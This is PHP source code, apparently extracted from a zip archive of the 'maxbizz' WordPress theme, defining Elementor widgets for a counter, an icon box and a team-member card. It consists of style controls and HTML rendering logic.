				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-counter-2 i' => 'color: {{VALUE}};',
					'{{WRAPPER}} .ot-counter-2 svg' => 'fill: {{VALUE}};',
				]
			]
		);

		/* number */
		$this->add_control(
			'heading_number',
			[
				'label' => __( 'Number', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_control(
			'number_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-counter-2 span' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'number_typography',
				'selector' => '{{WRAPPER}} .ot-counter-2 span',
			]
		);

		/* title */
		$this->add_control(
			'heading_title',
			[
				'label' => __( 'Title', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_responsive_control(
			'title_space',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .ot-counter-2 > p' => 'margin-top: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'title_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-counter-2 > p' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'title_typography',
				'selector' => '{{WRAPPER}} .ot-counter-2 > p',
			]
		);

		$this->end_controls_section();

	}

	protected function render() {
		$settings = $this->get_settings_for_display();
		?>
		<div class="ot-counter-2 icounter" data-counter="<?php echo $settings['number']; ?>">
			<?php if ( ! empty( $settings['icon_font']['value'] ) ) { Icons_Manager::render_icon( $settings['icon_font'], [ 'aria-hidden' => 'true' ] ); } ?>
        	<div class="c-number font-second">
        		<span class="num" data-to="<?php echo $settings['number']; ?>" data-time= "<?php echo $settings['time']['size']; ?>"></span><?php if( $settings['after_number'] ) { echo '<span>' .$settings['after_number']. '</span>'; } ?>
        	</div>
        	<?php if( $settings['title'] ) { echo '<p>' .$settings['title']. '</p>'; } ?>      				        
	    </div>
	    <?php
	}

	protected function _content_template() {}

	public function get_keywords() {
		return [ 'number', 'funfact' ];
	}
}
// After the Maxbizz_Counter class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new Maxbizz_Counter2() );PK�8FZ�|�(II,inc/backend/elementor/widgets/icon-box-1.phpnu�[���<?php
namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Widget Name: Icon Box 1
 */
class Maxbizz_IconBox1 extends Widget_Base{

 	// The get_name() method is a simple one, you just need to return a widget name that will be used in the code.
	public function get_name() {
		return 'iiconbox1';
	}

	// The get_title() method, which again, is a very simple one, you need to return the widget title that will be displayed as the widget label.
	public function get_title() {
		return __( 'OT Icon Box 1', 'maxbizz' );
	}

	// The get_icon() method, is an optional but recommended method, it lets you set the widget icon. you can use any of the eicon or font-awesome icons, simply return the class name as a string.
	public function get_icon() {
		return 'eicon-icon-box';
	}

	// The get_categories method, lets you set the category of the widget, return the category name as a string.
	public function get_categories() {
		return [ 'category_maxbizz' ];
	}

	protected function _register_controls() {

		//Content Service box
		$this->start_controls_section(
			'content_section',
			[
				'label' => __( 'Icon Box', 'maxbizz' ),
			]
		);

		$this->add_responsive_control(
			'align',
			[
				'label' => __( 'Alignment', 'maxbizz' ),
				'type' => Controls_Manager::CHOOSE,
				'options' => [
					'left'    => [
						'title' => __( 'Left', 'maxbizz' ),
						'icon' => 'eicon-text-align-left',
					],
					'center' => [
						'title' => __( 'Center', 'maxbizz' ),
						'icon' => 'eicon-text-align-center',
					],
					'right' => [
						'title' => __( 'Right', 'maxbizz' ),
						'icon' => 'eicon-text-align-right',
					]
				],
				'selectors' => [
					'{{WRAPPER}}' => 'text-align: {{VALUE}};',
				],
				'default' => 'center',
			]
		);
		$this->add_control(
			'icon_font',
			[
				'label' => __( 'Icon', 'maxbizz' ),
				'type' => Controls_Manager::ICONS,
				'fa4compatibility' => 'icon',
				'default' => [
					'value' => 'fas fa-star',
					'library' => 'fa-solid',
				],
			]
		);

		$this->add_control(
			'title',
			[
				'label' => __( 'Title', 'maxbizz' ),
				'type' => Controls_Manager::TEXTAREA,
				'default' => __( 'Design & Planning', 'maxbizz' ),
			]
		);
		$this->add_control(
			'header_size',
			[
				'label' => __( 'Title HTML Tag', 'elementor' ),
				'type' => Controls_Manager::SELECT,
				'options' => [
					'h1' => 'H1',
					'h2' => 'H2',
					'h3' => 'H3',
					'h4' => 'H4',
					'h5' => 'H5',
					'h6' => 'H6',
					'div' => 'div',
					'span' => 'span',
					'p' => 'p',
				],
				'default' => 'h5',
			]
		);

		$this->add_control(
			'des',
			[
				'label' => 'Description',
				'type' => Controls_Manager::TEXTAREA,
				'default' => __( 'We will help you to get the result you dreamed of.', 'maxbizz' ),
			]
		);

		$this->add_control(
			'link',
			[
				'label' => __( 'Link', 'maxbizz' ),
				'type' => Controls_Manager::URL,
				'placeholder' => __( 'https://your-link.com', 'maxbizz' ),
				'default'	=> [
					'url'	=> '#'
				],
			]
		);

		$this->add_control(
			'btn_text',
			[
				'label' => __( 'Label Button', 'maxbizz' ),
				'type' => Controls_Manager::TEXTAREA,
				'default' => __( '<i class="ot-flaticon-trajectory"></i> Learn More', 'maxbizz' ),
				'condition' => [
					'link[url]!' => '',
				]
			]
		);

		$this->end_controls_section();

		//Style

		$this->start_controls_section(
			'style_box_section',
			[
				'label' => __( 'General', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);		

		$this->add_control(
			'is_line',
			[
				'label'   => esc_html__( 'Bottom Line', 'maxbizz' ),
				'type'    => Controls_Manager::SWITCHER,
				'prefix_class' => 'bline-',
				'default' => 'yes',
			]
		);
		$this->add_control(
			'line_color',
			[
				'label' => __( 'Line Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .icon-box:after' => 'background: {{VALUE}};',
				],
				'condition' => [
					'is_line'	=> 'yes'
				]
			]
		);

		$this->add_responsive_control(
			'box_padding',
			[
				'label' => 'Padding Box',
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', 'em', '%' ],
				'selectors' => [
					'{{WRAPPER}} .icon-box' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);

		$this->start_controls_tabs( 'tabs_box_style' );
		$this->start_controls_tab(
			'tab_bg_normal',
			[
				'label' => __( 'Normal', 'maxbizz' ),
			]
		);
		$this->add_control(
			'bg_box',
			[
				'label' => __( 'Background Box', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .icon-box' => 'background: {{VALUE}};',
				],
			]
		);
		$this->add_group_control(
			Group_Control_Box_Shadow::get_type(),
			[
				'name' => 'box_box_shadow',
				'selector' => '{{WRAPPER}} .icon-box',
			]
		);

		$this->end_controls_tab();

		$this->start_controls_tab(
			'tab_bg_hover',
			[
				'label' => __( 'Hover', 'maxbizz' ),
			]
		);
		$this->add_control(
			'hover_dark',
			[
				'label'   => esc_html__( 'Dark Style', 'maxbizz' ),
				'type'    => Controls_Manager::SWITCHER,
				'prefix_class' => 'hover-dark-',
				'default' => 'yes',
			]
		);
		$this->add_control(
			'bg_hover_box',
			[
				'label' => __( 'Background Box', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .icon-box:hover' => 'background: {{VALUE}};',
				],
				'separator' => 'before',
			]
		);
		$this->add_group_control(
			Group_Control_Box_Shadow::get_type(),
			[
				'name' => 'hover_box_shadow',
				'selector' => '{{WRAPPER}} .icon-box:hover',
			]
		);
		$this->add_control(
			'bg_hover_icon_color',
			[
				'label' => __( 'Icon Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .icon-box:hover .icon-main' => 'color: {{VALUE}};',
					'{{WRAPPER}} .icon-box:hover svg' => 'fill: {{VALUE}};'
				],
				'separator' => 'before',
			]
		);
		$this->add_control(
			'bg_hover_icon_bg',
			[
				'label' => __( 'Background Icon', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .icon-box:hover .icon-main' => 'background: {{VALUE}};',
				],
			]
		);
		$this->add_group_control(
			Group_Control_Box_Shadow::get_type(),
			[
				'name' => 'hover_icon_shadow',
				'selector' => '{{WRAPPER}} .icon-box:hover .icon-main',
			]
		);
		$this->add_control(
			'bg_hover_title_color',
			[
				'label' => __( 'Title Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .icon-box:hover .title-box, {{WRAPPER}} .icon-box:hover .title-box a' => 'color: {{VALUE}};',
				],
				'separator' => 'before',
			]
		);

		$this->add_control(
			'bg_hover_des_color',
			[
				'label' => __( 'Description Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .icon-box:hover p' => 'color: {{VALUE}};',
				],
				'separator' => 'before',
				'condition' => [
					'des!' => ''
				]
			]
		);

		$this->add_control(
			'bg_hover_link_btn_color',
			[
				'label' => __( 'Button Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .icon-box:hover .link-details' => 'color: {{VALUE}};',
				],
				'separator' => 'before',
				'condition' => [
					'btn_text!'	 => '',
				]
			]
		);
		$this->add_control(
			'heading_hcircle',
			[
				'label' => __( 'Border Circle', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
				'condition' => [
					'is_border' => 'yes',
				]
			]
		);

		$this->add_control(
			'circle_hcolor',
			[
				'label' => __( 'Border Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .icon-box-1:hover .icon-main .circle-animate' => 'border-color: {{VALUE}};',
				],
				'condition' => [
					'is_border' => 'yes',
				]
			]
		);
		$this->add_control(
			'dot_hcolor',
			[
				'label' => __( 'Dot Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .icon-box-1:hover .icon-main .circle-animate:after' => 'background: {{VALUE}};',
				],
				'condition' => [
					'is_border' => 'yes',
				]
			]
		);

		$this->end_controls_tab();
		$this->end_controls_tabs();
		$this->end_controls_section();
		
		$this->start_controls_section(
			'style_icon_section',
			[
				'label' => __( 'Icon', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);
		$this->add_control(
			'is_border',
			[
				'label'   => esc_html__( 'Border Circle', 'maxbizz' ),
				'type'    => Controls_Manager::SWITCHER,
				'prefix_class' => 'with-border-',
				'default' => 'no',
			]
		);
		$this->add_responsive_control(
			'icon_space',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .icon-main' => 'margin-bottom: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_responsive_control(
			'icon_size',
			[
				'label' => __( 'Size', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .icon-main i' => 'font-size: {{SIZE}}{{UNIT}};',
					'{{WRAPPER}} .icon-main svg' => 'width: {{SIZE}}{{UNIT}};'
				],
			]
		);
		$this->add_responsive_control(
			'icon_bg_width',
			[
				'label' => __( 'Background Width', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 200,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .icon-main' => 'width: {{SIZE}}{{UNIT}}; height: {{SIZE}}{{UNIT}}; line-height: {{SIZE}}{{UNIT}};',
					'{{WRAPPER}} .icon-main i' => 'line-height: {{SIZE}}{{UNIT}};',
					'{{WRAPPER}} .circle-animate' => 'width: calc({{SIZE}}{{UNIT}} + 30px); height: calc({{SIZE}}{{UNIT}} + 30px);',
				],
			]
		);
		$this->add_control(
			'radius_box',
			[
				'label' => __( 'Border Radius', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', '%' ],
				'selectors' => [
					'{{WRAPPER}} .icon-main' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'icon_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .icon-main i' => 'color: {{VALUE}};',
					'{{WRAPPER}} .icon-main svg' => 'fill: {{VALUE}};'
				],
			]
		);
		$this->add_control(
			'icon_bg',
			[
				'label' => __( 'Background', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .icon-main' => 'background: {{VALUE}};',
				],
			]
		);
		$this->add_group_control(
			Group_Control_Box_Shadow::get_type(),
			[
				'name' => 'icon_shadow',
				'selector' => '{{WRAPPER}} .icon-main',
			]
		);

		/* circle animate */
		$this->add_control(
			'heading_circle',
			[
				'label' => __( 'Border Circle', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
				'condition' => [
					'is_border' => 'yes',
				]
			]
		);
		$this->add_control(
			'circle_color',
			[
				'label' => __( 'Border Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .circle-animate' => 'border-color: {{VALUE}};',
				],
				'condition' => [
					'is_border' => 'yes',
				]
			]
		);
		$this->add_control(
			'dot_color',
			[
				'label' => __( 'Dot Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .circle-animate:after' => 'background: {{VALUE}};',
				],
				'condition' => [
					'is_border' => 'yes',
				]
			]
		);

		$this->end_controls_section();

		$this->start_controls_section(
			'style_content_section',
			[
				'label' => __( 'Content', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);

		//Title
		$this->add_control(
			'heading_title',
			[
				'label' => __( 'Title', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
			]
		);
		$this->add_responsive_control(
			'title_space',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .icon-box .title-box' => 'margin-bottom: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'title_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .icon-box .title-box, {{WRAPPER}} .icon-box .title-box a' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'title_hover_color',
			[
				'label' => __( 'Hover Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .icon-box .title-box a:hover' => 'color: {{VALUE}};',
				],
				'condition' => [
					'link[url]!' => '',
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'title_typography',
				'selector' => '{{WRAPPER}} .icon-box .title-box',
			]
		);

		//Description
		$this->add_control(
			'heading_des',
			[
				'label' => __( 'Description', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
				'condition' => [
					'des!' => ''
				]
			]
		);
		$this->add_control(
			'des_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .icon-box p' => 'color: {{VALUE}};',
				],
				'condition' => [
					'des!' => ''
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'des_typography',
				'selector' => '{{WRAPPER}} .icon-box p',
				'condition' => [
					'des!' => ''
				]
			]
		);

		//Button Link
		$this->add_control(
			'heading_link',
			[
				'label' => __( 'Button', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
				'condition' => [
					'link[url]!' => '',
					'btn_text!'	 => '',
				]
			]
		);
		$this->add_responsive_control(
			'btn_space',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .icon-box .link-details' => 'margin-top: {{SIZE}}{{UNIT}};',
				],
				'condition' => [
					'link[url]!' => '',
					'btn_text!'	 => '',
				]
			]
		);
		$this->add_control(
			'link_btn_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .icon-box .link-details' => 'color: {{VALUE}};',
				],
				'condition' => [
					'link[url]!' => '',
					'btn_text!'	 => '',
				]
			]
		);
		$this->add_control(
			'link_btn_hover_color',
			[
				'label' => __( 'Hover Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .icon-box .link-details:hover' => 'color: {{VALUE}};',
				],
				'condition' => [
					'link[url]!' => '',
					'btn_text!'	 => '',
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'link_btn_typography',
				'selector' => '{{WRAPPER}} .icon-box .link-details',
				'condition' => [
					'link[url]!' => '',
					'btn_text!'	 => '',
				]
			]
		);

		$this->end_controls_section();

	}

	protected function render() {
		$settings = $this->get_settings_for_display();

		$this->add_render_attribute( 'heading', 'class', 'title-box' );
		$title = $settings['title'];
		$title_html = sprintf( '<%1$s %2$s>%3$s</%1$s>', $settings['header_size'], $this->get_render_attribute_string( 'heading' ), $title );

		if ( ! empty( $settings['link']['url'] ) ) {
			$this->add_render_attribute( 'iconbox', 'href', $settings['link']['url'] );

			if ( $settings['link']['is_external'] ) {
				$this->add_render_attribute( 'iconbox', 'target', '_blank' );
			}

			if ( $settings['link']['nofollow'] ) {
				$this->add_render_attribute( 'iconbox', 'rel', 'nofollow' );
			}
			$title_html = sprintf( '<%1$s %2$s><a ' .$this->get_render_attribute_string( 'iconbox' ). '>%3$s</a></%1$s>', $settings['header_size'], $this->get_render_attribute_string( 'heading' ), $title );
		}

		?>
		<div class="icon-box icon-box-1">
			<div class="icon-main">
				<span class="circle-animate"></span>
		    	<?php if( $settings['icon_font'] != '' ) { Icons_Manager::render_icon( $settings['icon_font'], [ 'aria-hidden' => 'true' ] ); } ?>
	        </div>
	        <div class="content-box">
				<?php if( $settings['title'] ) { echo $title_html; } ?>
				<?php if( $settings['des'] ) { echo '<p>' .$settings['des']. '</p>'; } ?>
			</div>
			<?php if( $settings['btn_text'] ) { 
        	echo '<div class="link-box">
        			<a ' .$this->get_render_attribute_string( 'iconbox' ). 'class="link-details">' .$settings['btn_text']. '</a>
        		</div>';
	        } ?>	
	    </div>
	    <?php
	}

	protected function _content_template() {}

	public function get_keywords() {
		return [ 'service' ];
	}
}
// After the Maxbizz_IconBox1 class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new Maxbizz_IconBox1() );PK�8FZni�@�@(inc/backend/elementor/widgets/team-3.phpnu�[���<?php 
namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Widget Name: Team 3
 */
class Maxbizz_Team3 extends Widget_Base{

 	// The get_name() method is a simple one, you just need to return a widget name that will be used in the code.
	public function get_name() {
		return 'imember3';
	}

	// The get_title() method, which again, is a very simple one, you need to return the widget title that will be displayed as the widget label.
	public function get_title() {
		return __( 'OT Team 3', 'maxbizz' );
	}

	// The get_icon() method, is an optional but recommended method, it lets you set the widget icon. you can use any of the eicon or font-awesome icons, simply return the class name as a string.
	public function get_icon() {
		return 'eicon-person';
	}

	// The get_categories method, lets you set the category of the widget, return the category name as a string.
	public function get_categories() {
		return [ 'category_maxbizz' ];
	}

	protected function _register_controls() {

		/**TAB_CONTENT**/
		$this->start_controls_section(
			'content_section',
			[
				'label' => esc_html__( 'Member Team', 'maxbizz' ),
			]
		);

		$this->add_control(
	       'member_image',
	        [
	            'label' => esc_html__( 'Photo', 'maxbizz' ),
	            'type'  => Controls_Manager::MEDIA,
				'default' => [
					'url' => get_template_directory_uri().'/images/c-member-2.jpg',
				]
		    ]
		);
		$this->add_group_control(
			Group_Control_Image_Size::get_type(),
			[
				'name' => 'member_image_size',
				'exclude' => ['1536x1536', '2048x2048'],
				'include' => [],
				'default' => 'full',
			]
		);

	    $this->add_control(
		    'member_name',
	      	[
	          	'label' => esc_html__( 'Name', 'maxbizz' ),
	          	'type'  => Controls_Manager::TEXTAREA,
				'default' => esc_html__( 'Peter Perish', 'maxbizz' ),
	    	]
	    );

	    $this->add_control(
		    'member_extra',
	      	[
	          	'label' => esc_html__( 'Extra/Job', 'maxbizz' ),
	          	'type'  => Controls_Manager::TEXTAREA,
	          	'default' => esc_html__( 'co-founder of company', 'maxbizz' ),
	    	]
	    );

		$repeater = new Repeater();
		$repeater->add_control(
	      	'title',
		    [
		        'label'   => esc_html__( 'Name', 'maxbizz' ),
		        'type'    => Controls_Manager::TEXT,
		        'default' => esc_html__( 'Social', 'maxbizz' ),
		    ]
	    );

        $repeater->add_control(
            'social_icon',
            [
                'label' => esc_html__( 'Icon', 'maxbizz' ),
                'type'  => Controls_Manager::ICONS,
                'fa4compatibility' => 'icon',
				'default' => [
					'value' => 'fab fa-twitter',
					'library' => 'fa-brand',
				],
            ]
        );

        $repeater->add_control(
            'social_link',
            [
                'label' => esc_html__( 'Link', 'maxbizz' ),
                'type'  => Controls_Manager::URL,
                'dynamic' => [
					'active' => true,
				],
				'placeholder' => __( 'https://', 'maxbizz' ),
				'default' => [
					'url' => 'https://', 
				],
            ]
		);

		$this->add_control(
		    'social_share',
		    [
		        'label'       => esc_html__( 'Socials', 'maxbizz' ),
		        'type'        => Controls_Manager::REPEATER,
		        'show_label'  => true,
		        'default'     => [
		            [
		             	'title'       => esc_html__( 'Twitter', 'maxbizz' ),
		                'social_link' => esc_html__( 'https://www.twitter.com/', 'maxbizz' ),
		                'social_icon' => [
							'value' => 'fab fa-twitter',
							'library' => 'fa-brand',
						],
		 
		            ],
		            [
		             	'title'       => esc_html__( 'Facebook', 'maxbizz' ),
		                'social_link' => esc_html__( 'https://www.facebook.com/', 'maxbizz' ),
		                'social_icon' => [
							'value' => 'fab fa-facebook-f',
							'library' => 'fa-brand',
						],
		 
		            ],
		            [
		             	'title'       => esc_html__( 'Pinterest', 'maxbizz' ),
		                'social_link' => esc_html__( 'https://www.pinterest.com/', 'maxbizz' ),
		                'social_icon' => [
							'value' => 'fab fa-pinterest-p',
							'library' => 'fa-brand',
						],

		            ]
		        ],
		        'fields'      => array_values( $repeater->get_controls() ),
		        'title_field' => '{{{title}}}',
		    ]
		);
		$this->add_control(
			'link',
			[
				'label' => __( 'Link To Details', 'maxbizz' ),
				'type' => Controls_Manager::URL,
				'placeholder' => __( 'https://', 'maxbizz' ),
			]
		);

		$this->end_controls_section();

		/**TAB_STYLE**/
		$this->start_controls_section(
			'content_style',
			[
				'label' => esc_html__( 'General', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);
		
		$this->add_control(
			'heading_normal',
			[
				'label' => __( 'Normal', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
			]
		);
		$this->add_responsive_control(
			'padding_box',
			[
				'label' => __( 'Padding Box', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', '%' ],
				'selectors' => [
					'{{WRAPPER}} .ot-team' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'radius_box',
			[
				'label' => __( 'Border Radius', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', '%' ],
				'selectors' => [
					'{{WRAPPER}} .ot-team' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'bg_box',
			[
				'label' => __( 'Background', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-team' => 'background: {{VALUE}};',
				],
			]
		);
		$this->add_group_control(
			Group_Control_Box_Shadow::get_type(),
			[
				'name' => 'box_box_shadow',
				'selector' => '{{WRAPPER}} .ot-team',
			]
		);

		
		$this->add_control(
			'box_animation',
			[
				'label' => __( 'Hover Animation', 'maxbizz' ),
				'type' => Controls_Manager::HOVER_ANIMATION,
				'default' => 'float',
			]
		);

		$this->end_controls_section();

		$this->start_controls_section(
			'photo_style',
			[
				'label' => esc_html__( 'Photo', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);

		$this->add_responsive_control(
			'photo_space',
			[
				'label' => esc_html__( 'Spacing', 'maxbizz' ),
				'type'  => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .ot-team .team-thumb' => 'margin-bottom: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'radius_photo',
			[
				'label' => __( 'Border Radius', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', '%' ],
				'selectors' => [
					'{{WRAPPER}} .ot-team img, {{WRAPPER}} .ot-team a' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);

		$this->add_control(
			'heading_hover',
			[
				'label' => __( 'Hover', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_control(
			'bg_overlay',
			[
				'label' => __( 'Background Overlay', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .team-thumb a:before' => 'background: {{VALUE}};',
				],
				'condition' => [
					'link[url]!'  => ''
				]
			]
		);
		$this->add_control(
			'color_icon_overlay',
			[
				'label' => __( 'Color Icon', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .team-thumb a:after' => 'color: {{VALUE}};',
				],
				'condition' => [
					'link[url]!'  => ''
				]
			]
		);

		$this->end_controls_section();

		$this->start_controls_section(
			'info_style',
			[
				'label' => esc_html__( 'Info Box', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);

		$this->add_responsive_control(
			'align',
			[
				'label' => __( 'Alignment', 'maxbizz' ),
				'type' => Controls_Manager::CHOOSE,
				'options' => [
					'left'    => [
						'title' => __( 'Left', 'maxbizz' ),
						'icon' => 'eicon-text-align-left',
					],
					'center' => [
						'title' => __( 'Center', 'maxbizz' ),
						'icon' => 'eicon-text-align-center',
					],
					'right' => [
						'title' => __( 'Right', 'maxbizz' ),
						'icon' => 'eicon-text-align-right',
					]
				],
				'selectors' => [
					'{{WRAPPER}} .ot-team' => 'text-align: {{VALUE}};',
				],
			]
		);
		/* title */
		$this->add_control(
			'heading_title',
			[
				'label' => __( 'Title', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);

		$this->add_responsive_control(
			'title_space',
			[
				'label' => esc_html__( 'Spacing', 'maxbizz' ),
				'type'  => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .ot-team h6' => 'margin-bottom: {{SIZE}}{{UNIT}};',
				],
			]
		);

		$this->add_control(
			'title_color',
			[
				'label'     => esc_html__( 'Color', 'maxbizz' ),
				'type'      => Controls_Manager::COLOR,
				'default'   => '',
				'selectors' => [
					'{{WRAPPER}} .ot-team h6, {{WRAPPER}} .ot-team h6 a' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'title_hcolor',
			[
				'label'     => esc_html__( 'Color Hover', 'maxbizz' ),
				'type'      => Controls_Manager::COLOR,
				'default'   => '',
				'selectors' => [
					'{{WRAPPER}} .ot-team h6 a:hover' => 'color: {{VALUE}};',
				],
				'condition' => [
					'link[url]!'  => ''
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name'     => 'title_typography',
				'label'    => esc_html__( 'Typography', 'maxbizz' ),
				'selector' => '{{WRAPPER}} .ot-team h6',
			]
		);

		/* extra */
		$this->add_control(
			'heading_job',
			[
